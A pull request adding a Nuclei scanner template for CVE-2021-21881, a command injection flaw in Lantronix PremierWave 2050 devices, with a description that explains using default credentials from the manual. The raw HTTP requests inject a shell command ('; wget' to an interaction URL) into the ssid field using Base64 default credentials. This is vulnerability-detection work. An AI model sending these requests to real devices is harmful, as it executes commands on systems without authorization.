### PR TITLE
Create CVE-2021-21881.yaml

### DIFF
--- a/cves/2021/CVE-2021-21881.yaml
+++ b/cves/2021/CVE-2021-21881.yaml
@@ -2,18 +2,18 @@ id: CVE-2021-21881
 
 info:
   name: Lantronix PremierWave 2050 - Remote Code Execution
-  description: An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
   author: gy741
   severity: critical
+  description: An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-21881
     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1325
-  tags: cve,cve2021,lantronix,rce
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21881
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.90
     cve-id: CVE-2021-21881
     cwe-id: CWE-78
+  tags: cve,cve2021,lantronix,rce,oast,cisco
 
 requests:
   - raw:
@@ -22,21 +22,13 @@ requests:
         Host: {{Hostname}}
         Authorization: Basic dXNlcjp1c2Vy
         Content-Type: application/x-www-form-urlencoded
-        Accept: */*
-        Accept-Encoding: gzip, deflate
-        Accept-Language: en-US,en;q=0.9
-        Connection: close
 
         ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} #
 
+      - |
         POST / HTTP/1.1
         Host: {{Hostname}}
-        Authorization: Basic 
-        Content-Type: application/x-www-form-urlencoded
-        Accept: */*
-        Accept-Encoding: gzip, deflate
-        Accept-Language: en-US,en;q=0.9
-        Connection: close
+        Authorization: Basic YWRtaW46UEFTUw==
 
         ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} #
 

--- a/cves/2021/CVE-2021-21881.yaml
+++ b/cves/2021/CVE-2021-21881.yaml
@@ -1,0 +1,47 @@
+id: CVE-2021-21881
+
+info:
+  name: Lantronix PremierWave 2050 - Remote Code Execution
+  description: An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
+  author: gy741
+  severity: critical
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21881
+    - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1325
+  tags: cve,cve2021,lantronix,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.90
+    cve-id: CVE-2021-21881
+    cwe-id: CWE-78
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic dXNlcjp1c2Vy
+        Content-Type: application/x-www-form-urlencoded
+        Accept: */*
+        Accept-Encoding: gzip, deflate
+        Accept-Language: en-US,en;q=0.9
+        Connection: close
+
+        ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} #
+
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic 
+        Content-Type: application/x-www-form-urlencoded
+        Accept: */*
+        Accept-Encoding: gzip, deflate
+        Accept-Language: en-US,en;q=0.9
+        Connection: close
+
+        ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} #
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"

--- a/cves/2021/CVE-2021-21881.yaml
+++ b/cves/2021/CVE-2021-21881.yaml
@@ -29,6 +29,7 @@ requests:
         POST / HTTP/1.1
         Host: {{Hostname}}
         Authorization: Basic YWRtaW46UEFTUw==
+        Content-Type: application/x-www-form-urlencoded
 
         ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} #
 


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2021-21881
```
An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
```

The cisco site example uses "user:user".

But, The manual uses "admin:PASS".

So I added a second request.

- References: 
 https://cdn.lantronix.com/wp-content/uploads/pdf/900-773-Ra_PW2050-QSG.pdf
https://talosintelligence.com/vulnerability_reports/TALOS-2021-1325

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)